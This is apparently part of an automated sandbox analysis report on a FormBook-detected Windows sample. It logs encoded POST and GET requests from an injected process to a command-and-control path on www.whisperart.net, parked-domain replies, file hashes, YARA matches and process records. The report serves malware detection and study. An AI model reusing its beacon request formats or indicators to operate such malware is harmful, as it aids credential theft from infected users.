                                                                  Data Raw: 65 36 73 48 38 3d 34 42 39 51 6e 2f 49 77 2f 44 6a 49 62 4d 31 53 49 77 53 35 47 4d 76 53 71 41 4e 54 6c 68 39 4f 56 31 6f 7a 32 7a 7a 50 5a 31 62 56 70 62 32 43 52 42 76 2b 76 35 5a 30 73 66 2b 54 75 67 4e 39 36 5a 64 4b 46 53 4d 49 45 6d 31 46 74 50 44 52 78 75 2f 56 77 4c 64 30 45 30 30 42 64 39 4a 76 6f 34 54 4f 2f 73 5a 48 2b 54 6e 4f 47 36 64 68 58 58 38 51 4b 56 39 74 2b 4b 6b 34 78 61 6f 75 2f 37 35 32 2b 70 35 61 37 45 71 6d 37 74 75 7a 47 78 4a 7a 2b 74 7a 31 64 52 68 66 4c 58 6f 68 73 4a 34 53 61 72 66 49 4f 73 53 52 4c 6e 30 41 52 62 30 53 36 4b 51 45 69 33 64 63 65 49 4a 33 66 66 53 31 73 32 73 3d
                                                                  Data Ascii: e6sH8=4B9Qn/Iw/DjIbM1SIwS5GMvSqANTlh9OV1oz2zzPZ1bVpb2CRBv+v5Z0sf+TugN96ZdKFSMIEm1FtPDRxu/VwLd0E00Bd9Jvo4TO/sZH+TnOG6dhXX8QKV9t+Kk4xaou/752+p5a7Eqm7tuzGxJz+tz1dRhfLXohsJ4SarfIOsSRLn0ARb0S6KQEi3dceIJ3ffS1s2s=
                                                                  Jan 11, 2025 01:23:41.311642885 CET1236INHTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:41 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1122
                                                                  x-request-id: a92fa98a-86e3-43c4-b0bb-4c4c5993754c
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                  set-cookie: parking_session=a92fa98a-86e3-43c4-b0bb-4c4c5993754c; expires=Sat, 11 Jan 2025 00:38:41 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 71 53 4c 4e 7a 4a 5a 56 4f 48 34 57 46 63 54 2f 5a 77 54 4c 50 33 54 6c 48 47 34 4e 53 69 72 70 44 37 57 4c 71 78 55 7a 33 5a 4b 36 4e 72 6b 31 72 75 35 4d 68 2b 70 73 33 72 68 54 36 53 50 78 63 73 43 4f 4d 54 36 4e 46 6b 48 35 64 31 4d 4c 4f 5a 7a 33 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:41.311676979 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTkyZmE5OGEtODZlMy00M2M0LWIwYmItNGM0YzU5OTM3NTRjIiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.550018199.59.243.228801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:43.421920061 CET718OUTPOST /rfcw/ HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.whisperart.net
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.whisperart.net/rfcw/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 34 42 39 51 6e 2f 49 77 2f 44 6a 49 61 74 46 53 4a 58 47 35 48 73 76 52 70 41 4e 54 38 78 39 4b 56 31 6b 7a 32 33 6a 66 65 41 4c 56 71 36 47 43 65 67 76 2b 2f 70 5a 30 6a 2f 2b 73 67 41 4e 36 36 59 68 73 46 54 77 49 45 6d 78 46 74 4b 2f 52 78 35 44 4b 71 37 64 36 64 6b 30 48 5a 39 4a 76 6f 34 54 4f 2f 73 4e 74 2b 54 2f 4f 47 4c 74 68 58 7a 49 54 48 31 39 73 35 4b 6b 34 6d 4b 6f 71 2f 37 35 51 2b 73 59 48 37 47 53 6d 37 6f 53 7a 47 41 4a 77 6e 64 7a 7a 51 78 67 68 4c 32 64 53 73 35 31 62 65 4a 4f 33 50 71 54 6b 48 78 46 71 4c 35 38 36 70 71 38 38 79 6b 56 72 50 34 6f 65 46 38 43 46 79 68 37 49 48 35 68 71 78 75 47 6f 75 66 44 30 4a 42 56 65 6e 38 55 67
                                                                  Data Ascii: e6sH8=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeALVq6GCegv+/pZ0j/+sgAN66YhsFTwIEmxFtK/Rx5DKq7d6dk0HZ9Jvo4TO/sNt+T/OGLthXzITH19s5Kk4mKoq/75Q+sYH7GSm7oSzGAJwndzzQxghL2dSs51beJO3PqTkHxFqL586pq88ykVrP4oeF8CFyh7IH5hqxuGoufD0JBVen8Ug
                                                                  Jan 11, 2025 01:23:43.896306038 CET1236INHTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:43 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1122
                                                                  x-request-id: a4521438-97f5-4fd6-867c-6cf170661989
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                  set-cookie: parking_session=a4521438-97f5-4fd6-867c-6cf170661989; expires=Sat, 11 Jan 2025 00:38:43 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 71 53 4c 4e 7a 4a 5a 56 4f 48 34 57 46 63 54 2f 5a 77 54 4c 50 33 54 6c 48 47 34 4e 53 69 72 70 44 37 57 4c 71 78 55 7a 33 5a 4b 36 4e 72 6b 31 72 75 35 4d 68 2b 70 73 33 72 68 54 36 53 50 78 63 73 43 4f 4d 54 36 4e 46 6b 48 35 64 31 4d 4c 4f 5a 7a 33 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:43.896328926 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTQ1MjE0MzgtOTdmNS00ZmQ2LTg2N2MtNmNmMTcwNjYxOTg5IiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.550019199.59.243.228801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:45.970124006 CET1735OUTPOST /rfcw/ HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.whisperart.net
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.whisperart.net/rfcw/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 34 42 39 51 6e 2f 49 77 2f 44 6a 49 61 74 46 53 4a 58 47 35 48 73 76 52 70 41 4e 54 38 78 39 4b 56 31 6b 7a 32 33 6a 66 65 44 72 56 71 49 2b 43 66 44 48 2b 74 35 5a 30 71 66 2b 58 67 41 4e 6e 36 5a 4a 67 46 54 39 7a 45 6b 5a 46 72 76 7a 52 6b 34 44 4b 2f 72 64 36 41 30 30 47 64 39 4a 41 6f 34 44 30 2f 73 64 74 2b 54 2f 4f 47 4a 31 68 44 33 38 54 46 31 39 74 2b 4b 6b 30 78 61 70 50 2f 37 67 6c 2b 73 55 58 37 31 61 6d 37 4d 4f 7a 57 6d 6c 77 75 64 7a 78 54 78 67 70 4c 32 42 4e 73 35 6f 67 65 49 36 4e 50 74 66 6b 44 51 70 38 59 35 6b 37 38 4a 55 4b 36 47 68 4b 5a 65 38 2f 4d 74 2b 50 76 42 58 7a 4e 74 4e 4a 78 4b 6d 66 6c 4d 4f 66 53 57 52 2f 6a 70 73 76 32 55 58 4f 53 72 65 61 4e 64 45 48 72 6d 69 4c 58 4b 31 45 48 66 75 79 50 6b 79 6d 55 2f 32 53 6b 79 55 32 32 37 6e 6a 36 30 44 58 34 79 73 48 4a 4e 4a 35 75 35 52 66 58 6c 4f 69 72 72 53 56 55 72 6e 48 6e 51 78 2b 6e 58 6e 6b 6f 6f 2b 42 6f 69 42 4a 4d 38 4f 34 76 31 7a 42 78 62 50 41 61 77 61 4f 73 49 52 59 61 44 67 5a 41 33 31 6c [TRUNCATED]
                                                                  Data Ascii: e6sH8=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeDrVqI+CfDH+t5Z0qf+XgANn6ZJgFT9zEkZFrvzRk4DK/rd6A00Gd9JAo4D0/sdt+T/OGJ1hD38TF19t+Kk0xapP/7gl+sUX71am7MOzWmlwudzxTxgpL2BNs5ogeI6NPtfkDQp8Y5k78JUK6GhKZe8/Mt+PvBXzNtNJxKmflMOfSWR/jpsv2UXOSreaNdEHrmiLXK1EHfuyPkymU/2SkyU227nj60DX4ysHJNJ5u5RfXlOirrSVUrnHnQx+nXnkoo+BoiBJM8O4v1zBxbPAawaOsIRYaDgZA31luQb9t2QafZOr3RtiqrHYCgM7kpJ8e9oeWQVnnFAuzh63SEjClgXSWmBnemej/UWpTa1ZLduAjTMz1z+1cV28vfEK+a4QVNWgviM/EiMYHOaRLfTk9mwhc0+0vLK9BrdwZgCRTDHIlgUn2Osarwj4nZdNUrbrr50KBH1HiTRIc0O4slpnW4JvoELdEAqVEpc/li2HlyGZ/7Xhm8ESPM/TiHtETJ1A7sWUfjaA+L6mnggtrnZi82czUxvmWkS97ygqlw1L+yyzAdQw8MMMMQ3nEtAtBjS4lw+ZRXH67UWymLtbRZt+UKPdoqNGKI6C1lVxlH4KP4WSJ8K3a3LO7o79MZkGAYXm/9d+xEDYjISsiFII1OiS1dOrecohKduCzldHUmN8Ra8EFGsZRcS5a6TySeH424MUbd09NkXT97o1pBhp4kY+SsliDTkWAiB9NkmsvjaaZVWxTdoo1MVe3xqcAB44kJCSpfXmj2D50lTagXb6Shy0hmKUltcUpvlUtGDaoVQdj28LyoL4AuPbYUVDmjpPZjA1FJ7fPiPVx5dVDP5rivyZ/KcjvcI9SUvFMWxFJqO4yA4NztpE0k1tZh7yf/rLkvdEHIOzoi4VaDhl/21s7Suw8bBAPqnAD0FIy0p8ZofYFq133yJf9WPM12AUAXCKaMECeXNZ88 [TRUNCATED]
                                                                  Jan 11, 2025 01:23:46.408795118 CET1236INHTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:45 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1122
                                                                  x-request-id: 4981307d-dd96-4233-89f7-e10c5ca781a1
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                  set-cookie: parking_session=4981307d-dd96-4233-89f7-e10c5ca781a1; expires=Sat, 11 Jan 2025 00:38:46 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 71 53 4c 4e 7a 4a 5a 56 4f 48 34 57 46 63 54 2f 5a 77 54 4c 50 33 54 6c 48 47 34 4e 53 69 72 70 44 37 57 4c 71 78 55 7a 33 5a 4b 36 4e 72 6b 31 72 75 35 4d 68 2b 70 73 33 72 68 54 36 53 50 78 63 73 43 4f 4d 54 36 4e 46 6b 48 35 64 31 4d 4c 4f 5a 7a 33 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:46.408843040 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDk4MTMwN2QtZGQ5Ni00MjMzLTg5ZjctZTEwYzVjYTc4MWExIiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.550020199.59.243.228801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:48.840531111 CET435OUTGET /rfcw/?e6sH8=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg87VqMj4zR8JAo57t+O519z31L6J8d3g4D3wlhoIiupxBhw==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.whisperart.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:49.286252975 CET1236INHTTP/1.1 200 OK
                                                                  date: Sat, 11 Jan 2025 00:23:48 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1486
                                                                  x-request-id: 9f1cc46f-94e9-4653-a8ab-f337d906de6c
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ywzo104erxEOs6rclKokf6yf/thsm+W5YTR5vT/jxYwrla8NKJFTzLLIeAyvwb3e5B6NokZnvfSuKOBjaQK/CQ==
                                                                  set-cookie: parking_session=9f1cc46f-94e9-4653-a8ab-f337d906de6c; expires=Sat, 11 Jan 2025 00:38:49 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 77 7a 6f 31 30 34 65 72 78 45 4f 73 36 72 63 6c 4b 6f 6b 66 36 79 66 2f 74 68 73 6d 2b 57 35 59 54 52 35 76 54 2f 6a 78 59 77 72 6c 61 38 4e 4b 4a 46 54 7a 4c 4c 49 65 41 79 76 77 62 33 65 35 42 36 4e 6f 6b 5a 6e 76 66 53 75 4b 4f 42 6a 61 51 4b 2f 43 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ywzo104erxEOs6rclKokf6yf/thsm+W5YTR5vT/jxYwrla8NKJFTzLLIeAyvwb3e5B6NokZnvfSuKOBjaQK/CQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 11, 2025 01:23:49.286289930 CET939INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWYxY2M0NmYtOTRlOS00NjUzLWE4YWItZjMzN2Q5MDZkZTZjIiwicGFnZV90aW1lIjoxNzM2NTU1MD


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:19:20:42
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\BcF3o0Egke.exe"
                                                                  Imagebase:0x60000
                                                                  File size:1'014'272 bytes
                                                                  MD5 hash:A04F2271AD163C1098D3CA9C311B53D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:19:20:59
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\BcF3o0Egke.exe"
                                                                  Imagebase:0x380000
                                                                  File size:1'014'272 bytes
                                                                  MD5 hash:A04F2271AD163C1098D3CA9C311B53D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:19:20:59
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\BcF3o0Egke.exe"
                                                                  Imagebase:0xa90000
                                                                  File size:1'014'272 bytes
                                                                  MD5 hash:A04F2271AD163C1098D3CA9C311B53D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:19:21:12
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe"
                                                                  Imagebase:0x700000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
